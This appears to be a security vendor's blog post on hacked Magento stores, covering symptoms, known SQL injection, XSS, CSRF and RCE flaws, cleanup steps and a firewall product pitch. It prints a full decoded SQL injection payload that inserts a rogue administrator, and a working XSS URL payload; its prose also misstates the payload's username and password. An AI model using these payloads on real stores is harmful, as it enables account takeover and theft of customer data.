Magento Hacked: Symptoms, Causes & Fixes

Magento is an open source e-commerce software that was designed to make it easier for everyday sellers to conduct online operations. Magento has a big presence in countries like Australia where it powers a large portion of e-commerce space. However, some severe vulnerabilities were reported in the software for which the company had to roll out a bundle of new updates titled SUPEE-10266. Most of the Magento hacked stores still suffer from the Magento Shoplift flaw which was discovered way back in 2015. The official support for Magento 1 would end soon and therefore stores which didn’t mitigate would be inviting hackers. According to Mark Lavelle, the CEO of Magento, 

Everyone is digital now. In our digital lives we’re relying on the technology and the internet, and even more so, the opportunity for bad guys to take advantage of that has blown up, as the internet has blossomed, the bad stuff has also blossomed.

Magento Hacked: Possible Consequences or Symptoms

  • Sensitive data were stolen from the store via phishing pages or javascript
  • The site appears to be infected with malicious redirects.
  • Site data may be sold on the onion sites to competitors.
  • Fake or adult advertisements or pop-ups may appear on site.
  • Google showing spam Japanese or Pharma search results for your website.
  • The site owner is unable to access the account and a ‘Your account has been suspended! message appears.
  • Magento store gets blacklisted by search engines.
  • The Magento store gets slow & shows error messages.
  • A sudden spike in traffic.
  • Users refrain from visiting your Magento store due to a lack of trust.
  • A decline in user traffic and revenue from the Magento store.
  • New, rogue admins appear in the login database.
  • Admin panel defaced or a blank screen after login.

Magento Hacked: Examples

Often, multiple Magento users are targeted by attackers in one go. Not every site admin may be an expert at security. Therefore, the troubled user can be found resorting to community forums for help, to fix the Magento hacked stores.

Magento hacked example
Magento hacked example 2

Your site powered by Magento Hacked ? Drop us a message on the chat widget and we’d be happy to help you. Fix my Hacked Magento website now.

Mageto Hacked: Possible Causes of Magento Hack

Magento Hacked: Magento SQL Injection

SQL injection is fairly common on web apps and targets the database of a Magento store. The database contains all the sensitive data like order history, transactions etc. Magento Community Edition (CE) 1.9.1.0 and Enterprise Edition (EE) 1.14.1.0 were vulnerable to an SQLi vulnerability. The component responsible for this was the getCsvFile function in the Mage_Adminhtml_Block_Widget_Grid class. It basically allowed remote admins to pass on SQL statements for execution. These were passed via the popularity[field_expr] parameter only after the popularity[from] or popularity[to] parameter is set. SQLi attacks exploiting these vulnerabilities were spotted in wild targeting Magento stores.

Magento 1

The target URL to which malicious data was passed on was:

http://www.example.com/index.php/admin/Cms_Wysiwyg/directive/index/

the malicious data was parsed by the attackers within the values of filter key i.e. (“filter”:malicious_value). The attackers used base64 encoding to evade detection and the final encoded payload is shown in the image given below.

magento hacked code

The SQL statements were inserted into the value of the filter key through the data which was parsed. When these malicious requests were decoded, the output obtained was:

popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);

SET @SALT = ‘rp’;

SET @PASS = CONCAT(MD5(CONCAT( @SALT , ‘asdf’) ), CONCAT(‘:’, @SALT ));

SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;

INSERT INTO `admin_user` (`firstname`,`lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES (‘Firstname’,’Lastname’,’email@example.com’,’sadmin’,@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());

INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,’U’,(SELECT user_id FROM admin_user WHERE username = ‘sadmin’),’Firstname’);

Please note that the code has been arranged into three paragraphs to make it easier to explain it otherwise it was one single payload. The first few SQL statements are basically setting a new password using an attacker chosen salt. Thereafter, the next group of SQL statements is inserting a new admin_user to the database. And the final few SQL statements are leveraging the role to admin. Therefore, the attackers have created a new user admin with username=”ypwq“, password=”123“. What is more alarming is that the exploit for this is publically available.

Magento 2

Magento Comunity Edition as well as Enterprise Edition prior to 2.0.10/2.1.2 was vulnerable to a bug in Zend Framework which led to an SQLi. The cause for this was that value escaping allowed an attacker to inject SQL statements via the ordering or grouping parameters. An entry point in the Magento Admin panel allowed the execution of complete SQL statements. Moreover, other entry points may still exist!

Magento Hacked: Magento XSS

Magento 1

An XSS vulnerability was discovered in Magento version 1.9.0.1. This was dubbed as CVE-2014-9758 and was a DOM-based XSS vulnerability. The list of files containing the vulnerable element were:

  • http://[magento_url]/skin/adminhtml/default/default/media/editor.swf
  • http://[magento_url]/skin/adminhtml/default/default/media/uploader.swf
  • http://[magento_url]/skin/adminhtml/default/default/media/uploaderSingle.swf

The cause for XSS was that the FlashVar parameter “bridgeName” was being passed to the ExternalInterface.call method without proper sanitation. As a result, it was possible to pass a malicious JavaScript code through the bridgeName parameter. Therefore, this malicious JS code runs whenever the page loads. The complete payload looked like:

http://example.com/skin/adminhtml/default/default/media/editor.swf?bridgeName=1%22]%29%29;alert%281%29}catch%28e%29{alert%281%29}//

Magento 2

Multiple XSS flaws dubbed as APPSEC-1503, APPSEC-1488, APPSEC-1539 have been found in Magento 2.0. Both, the community as well as enterprise editions before 2.0.10/2.1.2 are vulnerable. Out of these three, APPSEC-1503 and APPSEC-1488 are more severe in nature as they are stored XSS vulnerabilities.

  • APPSEC-1503: This flaw allows attackers to inject malicious javascript code within the email templates. When the templates are previewed, code execution takes place.
  • APPSEC-1488: Magento Enterprise Edition provides an invitations feature to its users. It is possible that the attacker may insert a malicious JavaScript code that would be then executed in the admin context.

Magento Hacked: Magento Cross-Site Request Forgery

Magento 1

A Magento CSRF attacks basically execute unwanted actions without the knowledge of the user.  A severe CSRF bug was found in Magento 1 which allowed remote attackers to inject script code to the application-side of the affected service module for execution. The component vulnerable to this was the ‘filename‘ parameter of the image upload module. The attackers used POST requests from the application-side to successfully conduct this attack. However, in order to exploit its, the attacker needed a low privileged web-application user account and low or medium user interaction. The code snippet of the vulnerable script is given below.

Magento hacked CSRF
Vulnerable script

Here, the ‘to‘ and parent_message_id parameters could be manipulated by the attackers due to lack of proper checks and balances. Using these the attacker could send a message to any other user without his/her consent. Moreover, it also gave an attacker other abilities to manipulate content on a Magento hacked store.

Magento 2

Magento Community and Enterprise editions before 2.0.10/2.1.2 suffered from two CSRF bugs.

  • APPSEC-1212: Magento failed to validate the anti-CSRF token while deleting items from the mini cart through a GET request. Therefore, the attacker could use this vulnerability to remove items from the cart through phishing and other tricks.
  • APPSEC-1433: This was a more severe CSRF vulnerability. Exploiting this, the attacker could delete any address on the store because due to the lack of anti-CSRF token or Referer header validation.

Magento Hacked: Magento Remote Code Execution

Magento CE and EE before 2.0.10/2.1.2 were vulnerable to Remote code execution. This was dubbed as APPSEC-1484 and had a severity rating of 9.8(critical). The cause of vulnerability was that some payment methods allowed users to execute malicious PHP code while checkout. The exploit, as well as the Metasploit module for this vulnerability, has already been released.

Magento Hacked: Other Causes

  • Weak or hard-coded credentials.
  • LFI, RFI, OWASP top 10 etc.
  • Outdated versions.
  • Server misconfigurations like open ports etc.
  • Poor hosting without subnets.

Need professional help to clean Hacked Magento site? Drop us a message on the chat widget and we’d be happy to help you. Fix my Hacked Magento Store now.

Cleaning A Magento Hacked Store

Magento Security: Damage Control

Begin damage control by first going through your logins. Ensure that no login credentials are default or hard coded. If so, change them to secure random passwords. The next step would be to clean the database of the store. Find and remove rogue users in the admin table. Or update the user passwords with a single SQL statement to lock out all the attackers. This can be done via the following SQL statement: update users set pass = concat(‘ZZZ’, sha(concat(pass, md5(rand()))));

Now proceed to deny access to sensitive folders. This can be done by creating a .htaccess file inside them. Within that file add the following code:

Order Deny,Allow
Deny from all
Allow from 22.33.44.55

These lines of code block access to the visitors of those particular folders. Here, the last line of code specifies which IPs to allow. Also look inside modified .htaccess files too. In case any such file is found make it a priority to clean it first.

Magento Security: Hunt for Malware

It is a well-known fact that attackers obfuscate the code in a format unreadable to humans. Base64 format comes in handy for the attackers as was in the case of Magento SQLi. To search for any base64 code within your files, execute the command:

find . -name "*.php" -exec grep "base64"'{}'; -print &> hiddencode.txt

This command would scan for base64 eth encoded lines of code. Thereafter it would be saved inside hiddencode.txt. Later on, it can be decoded using online tools for further analysis. Moreover, in case of spam attacks when gibberish is injected into every Magento hacked page, tools like phpMyAdmin can come handy. It can be used to search for malicious code within multiple pages in one go.

Magento hacked PHPmyadmin

Search for malicious code using phpMyAdmin within pages.

Magento Security: Restoring Files

After, the malicious code is revealed, remove it from the Magento hacked pages. If you are unsure about any code, comment it out and contact the experts. Restore the pages from a backup. If the backup is unavailable then use a fresh copy.

Magento Hacked Prevention

Update and Backup

Migrate to Magento 2. The Magento team updates critical flaws with each new update. This can be verified using the changelog. Moreover, avoid using unreputed extensions as they are likely to contain buggy code. Make sure to create a copy of the site. This could come in handy to restore the site after an attack. Updates and backups are the cheapest and most effective methods of securing a Magento store.

Security Audit

A security audit can protect the Magento store from attacks. Every Magento users cannot be an expert in security. Therefore use online services like Astra. Apart from this, Astra security audit and pen-testing can uncover severe threats present on the store. These vulnerabilities can be patched before an attacker exploits them!

Astra: Magento Malware Scanner and Magento Firewall Plugin

New vulnerabilities are uncovered in the Magento e-commerce solution each month. Though you can still keep your store safe from fraud and malware at as low as $9 per month. Buy a feasible firewall for your store. Astra is an out of box solution deployed on the cloud. This means protecting your store without using any resource hungry anti-virus solutions. Also, average users can comfortably use Astra through a simple dashboard. Installation of Magento Firewall plugins is pretty easy and if you still unable to figure out, Astra’s engineers got you covered. Astra firewall is the right choice for you being highly robust and scalable.

Cleaning and restoring a hacked Magento store is at times confusing and painstaking. The solution to all these problems is automatic tools like Astra. The Astra Magento malware scanner can detect and weed out multiple signatures of malware from hacked sites within minutes. Moreover, don’t worry about the files, Astra will patch them for you.

Take an Astra Demo Now!

Web Application Firewall Magento, Opencart Prestashop

Waiting to Get Hacked?

Get security tips & latest vulnerability fixes right in your inbox:

About The Author

A computer nerd. Loves working with Sqlmap and BeEF (the software) ;) Has experience in wireless pen tests. Owns a chatbot on Pandorabots named Mark1. In free time he can be found saving some goals.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Close